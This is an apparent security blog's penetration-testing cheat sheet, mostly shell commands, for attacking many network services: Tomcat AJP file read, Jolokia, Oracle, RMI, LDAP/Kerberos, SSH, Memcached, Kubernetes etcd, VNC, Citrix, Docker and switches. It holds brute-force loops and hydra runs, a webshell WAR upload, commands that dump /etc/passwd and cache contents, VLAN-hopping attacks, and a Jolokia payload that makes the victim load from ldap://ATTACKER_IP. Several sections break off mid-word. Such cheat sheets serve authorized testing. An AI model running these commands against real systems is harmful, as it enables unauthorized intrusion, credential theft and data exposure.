Steinz Security

  #Commonly Observed on Ports - 32064, 32357, 61616l you will find it together with RMI (1099 Port) & a webserver (6161 - jetty) Nmap Scan nmap -sV -Pn -n -T4 --script amqp-info -p 61616 10.10.10.10 Web server -- http://10.10.10.10:8161/admin -> default creds- admin:admin #Query the server curl -d 'body="Hello World"' "http://10.10.10.10:8161/demo/message/test?type=queue&clientId=consumerA" curl -u admin:admin -d "body=message" http://localhost:8161/api/message/TEST?type=queue Connecting to ActiveMQ (Might require creds) #Download activemq from here unzip filename go to conf/activemq-cli.config --> and update the IP Address broker { local { amqurl = "tcp://10.10.10.10:32064" jmxurl = "service:jmx:rmi:///jndi/rmi://10.10.10.10:1099/jmxrmi" username = "" password = "" prompt-color = "light-blue&q

  NMAP nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 10.10.10.10 Ghost Vulnerability - LFI Patached versions: after 9.0.31, 8.5.51, and 7.0.100 git clone https://github.com/doggycheng/CNVD-2020-10487.git python CNVD-2020-10487-Tomcat-Ajp-lfi.py -f /index.jsp 192.168.125.128 AJPY git clone https://github.com/hypn0s/AJPy.git python3 setup.py install #Get Version python tomcat.py version 10.10.10.10 python tomcat.py -v bf -U /opt/metasploit-framework/embedded/framework/data/wordlists/tomcat_mgr_default_users.txt -P /opt/metasploit-framework/embedded/framework/data/wordlists/tomcat_mgr_default_users.txt /manager/html 10.10.10.10 #Upload WAR File python tomcat.py upload -u tomcat -p tomcat webshell.war 172.17.0.2 #List available applications python tomcat.py list -u tomcat -p tomcat 172.17.0.2 #GHOST LFI CVE exploit python tomcat.py read_file --webapp=examples /WEB-INF/web.xml 172.17.0.2 Other attacks - Rev proxy attack nginx Module abuse - Re

  Usually found under - No Default port - can be used under any webserver /jolokia /actuator/jolokia #Get basic Version info and where it is being used curl http://10.10.10.10:8899/jolokia/ #Get the list of functions curl http://10.10.10.10/jolokia/list #Check Vuln Status to AccessLogValve Exploit curl -kL http://10.10.10.10:8080/jolokia/read/Catalina:host=localhost,name=AccessLogValve,type=Valve #Access an instance curl -d '{ "type" : "read", "mbean" : "java.lang:type=Memory", "target" : { "url" : "service:jmx:rmi:///jndi/ldap://ATTACKER_IP:8001/jmxrm" } }' 'http://VICTIM_IP:8080/jolokia/' Jolokia Tool Kit git clone https://github.com/laluka/jolokia-exploitation-toolkit python jolokia-parser.py http://10.10.10.10:8899/jolokia/ | tee jolokia-list.log #Commend EXEC - Based on the output create the command grep createStandardHost jolokia-list.log curl -skg 'http:

  #nmap nmap -Pn -sV -p1521 --script=oracle* 10.10.10.10 #Check for service Version #Oracle Database 11g 11.1.0.7, 11.2.0.2, and 11.2.0.3, and 10g 10.2.0.3, 10.2.0.4, and 10.2.0.5, #try this exploit GitHub - bongbongco/CVE-2012-1675: Oracle Database TNS Listener Poison Attack Vulnerability nmap -Pn -sT --script=+oracle-tns-poison.nse -p 1521 10.10.10.10 Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP ODAT - Oracle Database Attacking Tool #Download the release https://github.com/quentinhardy/odat/releases/ tar -xvf filename #Run ./odat all -s 10.10.10.10 ./odat all -s 10.10.10.10 -d SID_NAME ./odat all -s 10.10.10.10 -d '' #Check with creds ./odat all -s 192.168.1.254 -p 1521 -d ORCL -U SYS -P password #bruteforce when you know SID ./odat all -s 10.10.10.10 -d '' --accounts-file accounts/accounts_multiple.txt #Enum - Doesn't work if password protected sudo apt install tnscmd10g #Version tnscmd10g version -h 10.10.10.10 #Status tnscmd10g status -h 10.10.10.10

  RMI can be run on any nonstandard port and when RMI is running you will observer one more endpoint port connected to it (find it from nmap easily by running  rmi-dumpregistry  ) #jmxrmi  bound name and its signatures might be vulnerable to MLetMbean Vuln, where MBean that can be used for loading additional MBeans over the network. java.lang.String getVersion() javax.management.remote.rmi.RMIConnection newClient(java.lang.Object arg) Java RMI Registry - Port 1616 nmap -Pn -sS -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1616 BaRMIe #Download the package from releases https://github.com/NickstaDB/BaRMIe/releases/tag/v1.01 java -jar BaRMIe.jar -enum 192.168.1.11 5000 java -jar BaRMIe.jar -attack 192.168.1.11 5000 Remote Method Guesser https://github.com/qtc-de/remote-method-guesser java -jar rmg-3.0.0-jar-with-dependencies.jar 10.10.10.10 5000 enum #Look for Vulnerabilities java -jar rmg.jar enum 10.10.10.10 5000 #Get bound names & available method

  rpcdump.py 10.10.10.10 -p 593 TCP 135 is the Endpoint Mapper and Component Object Model (COM) Service Control Manager. There’s a tool called rpcmap.py from Impacket that will show these mappings. This tool needs a stringbinding argument to enable it’s connection. The examples from -h are: stringbinding String binding to connect to MSRPC interface, for example: ncacn_ip_tcp:192.168.0.1[135] ncacn_np:192.168.0.1[\pipe\spoolss] ncacn_http:192.168.0.1[593] ncacn_http:[6001,RpcProxy=exchange.contoso.com:443] ncacn_http:localhost[3388,RpcProxy=rds.contoso:443] rpcmap.py 'ncacn_ip_tcp:10.10.10.10' reference for MS-DCOM #if you find IOXIDResolver in the UUID's you can run below script to #list network interfaces git clone https://github.com/mubix/IOXIDResolver.git cd IOXIDResolver python3 -m pip install -r requirements.txt python IOXIDResolver.py -t 10.10.10.10 Other things to check reg.py 10.10.10.10 query -keyName HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows -s service

  DNS dig srv domaim.com @DC_IP #Query ldap service dig +short srv _ldap._tcp.dc._msdcs.dc.domain.com @DC_IP #query Root Domain Controller dig +short a rootdc.domain.com @DC_IP LDAP Enum #Nmap Scan for basic info nmap -n -sV --script "ldap* and not brute" -p389,636,3268,3269 10.10.10.10 #Get Domain name ldapsearch -x -h 10.10.10.10 -s base namingcontexts ldapsearch -H ldap://10.10.10.10 -x -s base namingcontexts #Look for misconfigs - Finding ms-MCS-AdmPwd ldapsearch -x -h forest.htb.local -b 'DC=HTB,DC=LOCAL' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd #Dump Everything ldapsearch -LLL -x -H ldap://10.10.10.10 -b '' -s base '(objectclass=*)' #Dump Everything using ldeep ldeep ldap -a -d STEINS.local -s ldap://10.10.10.10 all dump UserEnum git clone https://github.com/Bhanunamikaze/Wordlists.git cd Wordlists/Usernames kerbrute userenum --dc 10.10.10.10 -d test.domain.com Common_names.txt Find Pre-Auth Disabled Users GetNPUsers.py domain/ -u

  Checklist Check the version Vulnerabilities (get version from API) Refer to this Tenable Article Check for Puppet Naive autosigning enabled --> should be disabled you can scan it by via "nmap -p8140 --script puppet-naivesigning -sV 10.10.10.10" nmap -sSVC --privileged -vvv --reason -p 8140 --script puppet-naivesigning --script-args puppet-naivesigning.csr=/path/to/csr.pem,puppet-naivesigning.env=production,puppet-naivesigning.node=DomainnameOfAppServerControlledByPuppet 10.10.10.10 Look for unauthenticated API Access If API is accessible, run all commands to get Sensitive info Run this script Puppet_Pentest.py to Run most of the below commands at once. #Check whether Puppet Server is running on a server or not https://10.10.10.10:8140/status/v1/simple #Puppet Service Information - Check Services info (Agents) curl -k -X GET https://PUPPET-SERVER:8140/status/v1/services #Retrieve information about services running on Puppet Server https://10.10.10.10:8140/status/v

NMAP Commands nmap -sCV -p22 10.10.10.10 #nmap Vuln scan nmap -sC --script vuln,vulners -Pn -p22 10.10.10.10 #nmap Algorithm enum #if you find CBC & HMAC in ciphers --> vulnerable nmap -Pn -sS -sV -p 22 --script ssh2-enum-algos 10.10.10.10 Brute Forcing hydra -L userx.txt -P wordlist.txt -v VICTIM_IP ssh hydra -l username -P password_file.txt -s port ssh Enum via Metasploit #User Enum --> works only on few old versions use auxiliary/scanner/ssh/ssh_enumusers #Version Detection use auxiliary/scanner/ssh/ssh_version #Brutefocing SSH use auxiliary/scanner/ssh/ssh_login #FTP Bruteforce use auxiliary/scanner/ftp/ftp_login Cracking SSH Private Key.ppk sudo apt install putty-tools #Genrate id_rsa for ssg login, if it asks for password - Password needs to be cracked puttygen private.ppk -O private-openssh -o id_rsa putty2john private.ppk > hash john --format=PuTTY --fork=4 hash -w=wordlist.txt #Enter the cracked password puttygen private.ppk -O private-openssh -

  Memcached - Port 11211,10013 telnet 10.10.10.10 10014 #run stats to view info stats version Enum using Mem Tools apt install libmemcached-tools #Get stats memcstat --servers=10.10.10.10 #Dump key value pairs memcdump --servers=10.10.10.10 #upload a file memccp --servers=10.10.10.10 a.txt #view a file memccat --servers=10.10.10.10 /etc/passwd #List items stats items Enum using Metasploit use auxiliary/gather/memcached_extractor set rhosts 10.10.10.10 run Bruteforcing Memcached Creds #! /bin/bash while read F ; do echo "Trying $F" if memcstat --servers=$1 --username=$2 --password=$F | grep -q Server ; then echo "Password Found: "$F break fi done < $3 ./script $target $username <wordlist> Dump all the Data from the keys/files while read -r key; do [ -f "$key" ] || echo "get $key" | nc 10.10.10.10 11211 > "$key.dump"; done < <(memcdump --server 10.10.10.10) Check this out for more in

     Ports Info Kubelet API: Port 10250: The Kubelet is the main component in every Node, all pod operations goes through the kubelet Etcd: Port 2379: Etcd is a DB that stores cluster's data, it contains configuration and current state iformation, and might contain secrets API Server: Port 6443: The API server is in charge of all operations on the cluster. - Check API's Access Kube-Hunter #Download kube-hunter from the releases https://github.com/aquasecurity/kube-hunter/releases ./kube-hunter #start active scan ./kube-hunter --cidr 10.10.10.10 --active ETCD Anonymous Access 2379/tcp & 2380/tcp - etcd servers Download etcdctl from here etcdctl --endpoints=http://10.10.10.10:2379 get / –prefix –keys-only for ip in $(cat kube_pods); do etcdctl --endpoints=http://$1:2380 get / –prefix –keys-only | grep -v "rpc error:"; echo "---------- testing $ip-----------" ; done Look for Open Pods Ports 10200 - 10259 curl -kvL https://10.10.1

#nmap - Finding VNC Enabled Servers nmap -Pn - p5900,5901,5902,5903,5905,5906 10.10.10.0/24 -p5910,5911,5912,5914,5915,5916 #Nmap Script Scan nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p5900 10.10.10.10 #VNC brute using nmap nmap -Pn -sV -p5900 --script vnc-brute 10.10.10.10 Metasploit Auth Scanning use auxiliary/scanner/vnc/vnc_none_auth set RHOSTS 192.168.1.0/24 set THREADS 50 run or use use auxiliary/scanner/vnc/vnc_login Brute forcing VNC Creds hydra -s 5901 -P pass.txt -t 16 10.10.10.10 vnc VNC 4 --> Real VNC 4 - Auth Bypass Get VNC Password from Registry reg query "HKCU\Software\ORL\WinVNC3\Password" reg query "HKCU\Software\TightVNC\Server /v PasswordViewOnly" vncpwd.exe PASSWORD_FROM_ABOVE Search for keyword "pass,cred,vnc and config" dir /s *pass* == *cred* == *vnc* == *.config*  

NTP - Port 123 nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 10.10.10.10 ntpq -c readlist <IP_ADDRESS> ntpq -c readvar <IP_ADDRESS> ntpq -c peers <IP_ADDRESS> ntpq -c associations <IP_ADDRESS> ntpdc -c monlist <IP_ADDRESS> ntpdc -c listpeers <IP_ADDRESS> ntpdc -c sysinfo <IP_ADDRESS> #You can use any of the below commands :config drefid mreadlist readvar addvars exit mreadvar reslist apeers help mrl rl associations host mrulist rmvars authenticate hostnames mrv rv authinfo ifstats ntpversion saveconfig cl iostats opeers showvars clearvars kerninfo passociations sysinfo clocklist keyid passwd sysstats clockvar keytype peers timeou

In lot of scenarios, we usually don't have access to GUI access to web applications but in most of the scenarios - you can find curl installed on the test machine - so, below is a simple cheat sheet to run basic checks #Get request using Curl curl -I http://10.10.10.10 # Send Post Request curl --data "param1=value1&param2=value2" http://10.10.10.10 #Check for Trace Method curl -k -v -X TRACE http://10.10.10.10 #PUT Request curl -X PUT -d "PUT request data" http://10.10.10.10 curl -kL https://10.10.10.10 -T file.txt #HEAD Request curl -I http://10.10.10.10 #Test DEBUG Method --> if Response "OK" --> DEBUG is enabled curl -X DEBUG https://10.10.10.10 -k -v -H "Command: stop-debug" #Ignore SSL warnings curl -k http://10.10.10.10 #Follow Redirection curl -L http://10.10.10.10 #Add headers in a JSON GET request curl -i -H "Accept: application/json" -H "Content-Type: application/json" http://10.10.10.10 #

Citrix Servers - Ports 1604 - Citrix MetaFrame ICA 1494/tcp open citrix-ica Citrix Metaframe XP ICA - Citrix VDI (Virtual Delivery Agent) 2598/tcp open citriximaclient #Below 4 are used in Load Balancers 3008/tcp open ssl/midnight-tech? 3009/tcp open ssl/mep Citrix NetScaler Metric Exchange Protocol 3010/tcp open gw?                     Citrix NetScaler Gateway 3011/tcp open mep Citrix NetScaler Metric Exchange Protocol nmap -sS -sU --script citrix-enum-apps,citrix-enum-servers -i ips.txt -Pn -oA citrix For Citrix ADC - Default Username/Password : nsroot/nsroot Finding Citrix ADC Version https://10.10.10.10/nitro/v1/config/nsversion or curl -X GET -H "Content-Type: application/json" -u nsroot:examplepassword http://<Citrix-ADC-IP-address(NSIP)>/nitro/v1/config/nsversion curl -X GET -H "Content-Type: application/json" -u <username>:<examplepassword> http://<Citrix-ADC-IP-address(NSIP)>/nit

 SMB Enum Scripts and Checklists Enumerating SMB Shares my $host = "10.10.10.10"; my $filename = "/usr/share/wordlists/SecLists/blob/master/Discovery/Web-Content/common.txt"; open(my $fh, '<', $filename) or die $!; while (my $word = <$fh>) { chomp($word); ## Try to login with a username and no password my $result = qx( smbclient //$host/$word -N 2>/dev/null ); ## ACCESS_DENIED means the share exists ## BAD_NETW_NAME means the share does not exist if ($result =~ /NT_STATUS_ACCESS_DENIED/g ) { print "[+] Share Found @ //$host/$word\n"; next; } }

  CPANEL Ports cPanel 2082 cPanel - SSL 2083 WHM 2086 WHM - SSL 2087 Webmail 2095 Webmail - SSL 2096 SFTP Shared/Reseller Servers 2222 Webdisk 2077 Webdisk - SSL 2078 SSH Shared/Reseller Servers 2222 Plesk Control Panel 8880 Plesk Control Panel - SSL 8443 Plesk Windows Webmail (SmarterMail) 9998** DotNet Panel 9001 NDMP Port 10000 - NDMP nmap -p 10000 --script ndmp-fs-info,vuln -sVC -d 10.10.10.10 Port 30000 - NDMPS nmap -p 30000--script ndmp-fs-info,vuln -sVC -d 10.10.10.10 NetApp NDFS Common Ports Parallel Virtual File System (PVFS) TCP port 3334 - Heap Over flow nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 Docker Port - 2375 2375: unencrypted docker socket, remote root passwordless access to the host 2376: tls encrypted socket, most likely this is your CI servers 4243 port as a modification of the https 443 port 2377: swarm mode socket, for swarm managers, not for docker clients 5000: docker registry service 4789 and 7946

 Penetration testing Routers & Switches Routersploit Nipper-ng  dig nslookup port 1999 snmpsniff (v1 is vulnerable) test for NTP  Routersploit git clone https://www.github.com/threat9/routersploit.git/ cd routersploit python3 -m pip install -r requirements.txt python3 rsf.py search exploit search scanner use scanners/autopwn set target 10.10.10.10 Attacking Switches using Yersinia on Spanning Tree Protocol (STP) good doc https://github.com/tomac/yersinia #launch GUI yersinia -G # yersinia protocol -h #Start SPN attack and capture the traffic - sensitive info will be exposed to the network VLAN Enumeration and Hopping and Trunking git clone https://github.com/nccgroup/vlan-hopping.git ./frogger.sh #VLAN hopping/ Truking can be done via yersina as well #Create a new fake Trunk and let the switch believe that you are a trunk and ge the info via VLAN hopping yersinia -G go to DTP --> enable trunking # Test for Finger Services finger -l 10.10.10.10 finger -l user@10.10.10.10 Tes